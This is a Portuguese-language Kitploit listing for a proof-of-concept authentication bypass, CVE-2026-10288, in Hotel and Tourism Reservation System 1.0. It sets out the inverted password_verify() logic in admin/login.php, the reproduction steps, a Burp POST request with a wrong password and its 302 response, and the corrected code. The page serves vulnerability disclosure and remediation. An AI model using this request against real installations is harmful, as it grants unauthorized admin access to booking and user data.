Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-10288-AUTH-BYPASS — Exploit de prova de conceito para uma bypass de autenticação no Hotel and Tourism Reservation System 1.0, permitindo acesso admin não autenticado via lógica invertida de password_verify. | Kitploit
Ferramentas/GitHubGitHub/xmyronn/cve-2026-10288-auth-bypass
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebSegurança WebTestes de PenetraçãoAutenticação
GitHubxmyronn/cve-2026-10288-auth-bypass

CVE-2026-10288-AUTH-BYPASS

Exploit de prova de conceito para uma bypass de autenticação no Hotel and Tourism Reservation System 1.0, permitindo acesso admin não autenticado via lógica invertida de password_verify.

Ver Repositório
46há 3 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Sistema de Reserva de Hotéis e Turismo - Bypass de Autenticação

Detalhes da Vulnerabilidade

CampoDetalhes
TítuloSistema de Reserva de Hotéis e Turismo - Bypass de Autenticação
Fornecedorcode-projects.org
ProdutoHotel and Tourism Reservation System
Versão1.0
Tipo de VulnerabilidadeAutenticação Imprópria
CWECWE-287
Pontuação CVSS9.0 (Crítico)
Vetor CVSSCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Arquivo Afetado/admin/login.php
Autenticação NecessáriaNão
Explorável RemotamenteSim

Descrição

Existe uma vulnerabilidade crítica de bypass de autenticação na funcionalidade de login de administrador do Hotel and Tourism Reservation System 1.0. A vulnerabilidade é causada por uma verificação condicional invertida no valor de retorno de password_verify(), que faz com que a aplicação conceda acesso quando uma senha incorreta é fornecida e negue acesso quando a senha correta é fornecida. Um atacante remoto não autenticado pode obter acesso administrativo total fornecendo um endereço de email válido e qualquer senha incorreta arbitrária.


Causa Raiz

Arquivo: admin/login.php — Linhas 39–46

root@kitploit:~
if(password_verify($password, $user['password'])){
    // BUG: password_verify() returns TRUE when password is CORRECT
    // but the error message is placed here instead of login logic
    echo '<div class="w3-text-red text-center">The password you entered was incorrect, please try again.</div>';
} else {
    // BUG: this block executes when password is WRONG
    // but login is granted here instead of showing an error
    $userID = $user['id'];
    login($userID);
}

password_verify() retorna true quando a senha fornecida corresponde ao hash. O desenvolvedor colocou a lógica de sucesso dentro do ramo else (que executa quando a função retorna false), o que significa que a autenticação é concedida com qualquer senha incorreta.


Impacto

Um atacante remoto não autenticado pode:

  • Obter acesso administrativo total à aplicação
  • Visualizar, modificar e excluir todas as reservas de quartos e passeios
  • Adicionar, editar ou remover quartos, passeios e eventos
  • Acessar todos os dados de usuários registrados
  • Realizar todas as operações de administrador sem saber a senha do administrador

Passos para Reproduzir

Configuração: Instale o Hotel and Tourism Reservation System 1.0 no XAMPP. Acesse o aplicativo em http://localhost/ht/.

Passo 1: Navegue para a página de login de administrador.

http:///ht/admin/login.php

Passo 2: Insira um email de administrador válido com qualquer senha errada.

Email: [email protected] Senha: wrongpassword

Passo 3: Clique em Login.

Resultado: A aplicação ignora a autenticação e redireciona para o painel de administração (index.php) — acesso total de administrador concedido com uma senha incorreta.


Prova de Conceito (Burp Suite)

Requisição:

root@kitploit:~
POST /ht/admin/login.php HTTP/1.1
Host: <target>
Content-Type: application/x-www-form-urlencoded

email=admin%40admin.com&password=test1234&login=Login

Resposta:

root@kitploit:~
HTTP/1.1 302 Found
Location: index.php

Um redirecionamento 302 para index.php confirma a autenticação bem-sucedida com uma senha incorreta.


Capturas de Tela

1. Página de Login — Senha Incorreta Inserida

Screenshot 2026-05-11 232154

2. Burp Suite — Redirecionamento 302 Confirma Bypass

Screenshot 2026-05-11 232205

3. Código Fonte — Lógica Invertida

Screenshot 2026-05-11 232228

Correção Recomendada

Troque os ramos condicionais para que o login seja concedido quando password_verify() retornar true:

root@kitploit:~
// CORRIGIDO
if(password_verify($password, $user['password'])){
    $userID = $user['id'];
    login($userID);
} else {
    echo '<div class="w3-text-red text-center">The password you entered was incorrect, please try again.</div>';
}

Referências

  • CWE-287: Autenticação Imprópria
  • Hotel and Tourism Reservation System — code-projects.org

Descoberto Por

Imad Alvi — Pesquisador de Segurança Independente

Baixar ferramenta